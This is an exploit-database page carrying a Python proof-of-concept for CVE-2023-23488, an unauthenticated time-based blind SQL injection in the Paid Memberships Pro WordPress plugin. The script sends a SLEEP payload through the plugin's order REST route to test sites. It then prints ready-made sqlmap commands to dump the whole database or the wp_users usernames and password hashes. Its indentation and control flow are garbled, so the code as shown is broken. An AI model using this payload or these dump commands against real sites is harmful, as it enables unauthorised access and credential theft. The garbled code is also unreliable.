Exploits / Vulnerability Discovered : 2023-04-03 |
Type : webapps |
Platform : php
This exploit / vulnerability Paid memberships prov2.9.8 (wordpress plugin) unauthenticated sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/env python
# Exploit Title: Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection
# Exploit Author: r3nt0n
# CVE: CVE-2023-23488
# Date: 2023/01/24
# Vulnerability discovered by Joshua Martinelle
# Vendor Homepage: https://www.paidmembershipspro.com
# Software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.2.9.7.zip
# Advisory: https://github.com/advisories/GHSA-pppw-hpjp-v2p9
# Version: < 2.9.8
# Tested on: Debian 11 - WordPress 6.1.1 - Paid Memberships Pro 2.9.7
# Running this script against a WordPress instance with Paid Membership Pro plugin
# tells you if the target is vulnerable.
# As the SQL injection technique required to exploit it is Time-based blind, instead of
# trying to directly exploit the vuln, it will generate the appropriate sqlmap command
# to dump the whole database (probably very time-consuming) or specific chose data like
# usernames and passwords.
# Usage example: python3 CVE-2023-23488.py
import sys
import requests
def get_request(target_url, delay="1"):
payload = "a' OR (SELECT 1 FROM (SELECT(SLEEP(" + delay + ")))a)-- -"
data = {'rest_route': '/pmpro/v1/order',
'code': payload}
return requests.get(target_url, params=data).elapsed.total_seconds()
target_url = sys.argv[1]
print('[-] Testing if the target is vulnerable...')
req = requests.get(target_url, timeout=15)
print('{}[!] ERROR: Target is unreachable{}'.format(u'\033[91m',u'\033[0m'))
if get_request(target_url, "1") >= get_request(target_url, "2"):
print('{}[!] The target does not seem vulnerable{}'.format(u'\033[91m',u'\033[0m'))
print('\n{}[*] The target is vulnerable{}'.format(u'\033[92m', u'\033[0m'))
print('\n[+] You can dump the whole WordPress database with:')
print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump'.format(target_url))
print('\n[+] To dump data from specific tables:')
print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users'.format(target_url))
print('\n[+] To dump only WordPress usernames and passwords columns (you should check if users table have the default name):')
print('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users -C user_login,user_pass'.format(target_url))